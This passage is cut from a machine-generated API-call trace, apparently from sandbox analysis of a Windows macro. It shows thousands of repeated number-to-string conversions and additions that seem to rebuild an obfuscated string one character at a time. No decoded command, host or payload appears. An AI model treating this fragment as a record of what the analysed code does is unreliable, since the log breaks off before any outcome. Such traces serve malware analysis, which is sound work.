pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.044] GetUserDefaultLCID () returned 0x409 [0047.044] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x38\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.044] GetUserDefaultLCID () returned 0x409 [0047.044] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.044] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.045] GetUserDefaultLCID () returned 0x409 [0047.045] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.045] GetUserDefaultLCID () returned 0x409 [0047.045] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.045] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.046] GetUserDefaultLCID () returned 0x409 [0047.046] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x5f\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.047] GetUserDefaultLCID () returned 0x409 [0047.047] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.047] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.047] GetUserDefaultLCID () returned 0x409 [0047.047] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x38\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.048] GetUserDefaultLCID () returned 0x409 [0047.048] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.048] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.048] GetUserDefaultLCID () returned 0x409 [0047.048] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x30\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="^", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x5e\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.049] GetUserDefaultLCID () returned 0x409 [0047.049] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.049] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.049] GetUserDefaultLCID () returned 0x409 [0047.049] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="]", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x5d\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.050] GetUserDefaultLCID () returned 0x409 [0047.050] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.050] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.050] GetUserDefaultLCID () returned 0x409 [0047.050] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x5c\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.051] GetUserDefaultLCID () returned 0x409 [0047.051] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.051] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.052] GetUserDefaultLCID () returned 0x409 [0047.052] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.052] GetUserDefaultLCID () returned 0x409 [0047.052] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.052] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.053] GetUserDefaultLCID () returned 0x409 [0047.053] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x30\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.054] GetUserDefaultLCID () returned 0x409 [0047.054] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.054] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.055] GetUserDefaultLCID () returned 0x409 [0047.055] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x30\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.055] GetUserDefaultLCID () returned 0x409 [0047.055] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.055] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.056] GetUserDefaultLCID () returned 0x409 [0047.057] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x34\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.057] GetUserDefaultLCID () returned 0x409 [0047.057] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.057] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.058] GetUserDefaultLCID () returned 0x409 [0047.058] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x37\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x5c\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.058] GetUserDefaultLCID () returned 0x409 [0047.058] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.058] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.059] GetUserDefaultLCID () returned 0x409 [0047.059] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x30\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.059] GetUserDefaultLCID () returned 0x409 [0047.059] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.059] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.061] GetUserDefaultLCID () returned 0x409 [0047.061] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.061] GetUserDefaultLCID () returned 0x409 [0047.061] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.061] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.062] GetUserDefaultLCID () returned 0x409 [0047.062] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x37\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.062] GetUserDefaultLCID () returned 0x409 [0047.062] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.062] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.064] GetUserDefaultLCID () returned 0x409 [0047.064] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x34\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.064] GetUserDefaultLCID () returned 0x409 [0047.064] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.064] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.065] GetUserDefaultLCID () returned 0x409 [0047.065] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x5f\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.065] GetUserDefaultLCID () returned 0x409 [0047.065] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.065] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.066] GetUserDefaultLCID () returned 0x409 [0047.066] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x34\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x38\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.067] GetUserDefaultLCID () returned 0x409 [0047.067] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.067] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.068] GetUserDefaultLCID () returned 0x409 [0047.068] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.068] GetUserDefaultLCID () returned 0x409 [0047.068] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.068] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.069] GetUserDefaultLCID () returned 0x409 [0047.069] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="9", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x39\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.070] GetUserDefaultLCID () returned 0x409 [0047.070] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.070] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.072] GetUserDefaultLCID () returned 0x409 [0047.072] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xf060\x813") returned 0x0 [0047.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="]", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x5d\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.072] GetUserDefaultLCID () returned 0x409 [0047.072] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.072] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.073] GetUserDefaultLCID () returned 0x409 [0047.074] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.074] GetUserDefaultLCID () returned 0x409 [0047.074] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.074] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.075] GetUserDefaultLCID () returned 0x409 [0047.075] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x37\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.076] GetUserDefaultLCID () returned 0x409 [0047.076] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.076] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.077] GetUserDefaultLCID () returned 0x409 [0047.077] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x5f\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.077] GetUserDefaultLCID () returned 0x409 [0047.077] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.077] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.078] GetUserDefaultLCID () returned 0x409 [0047.078] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, 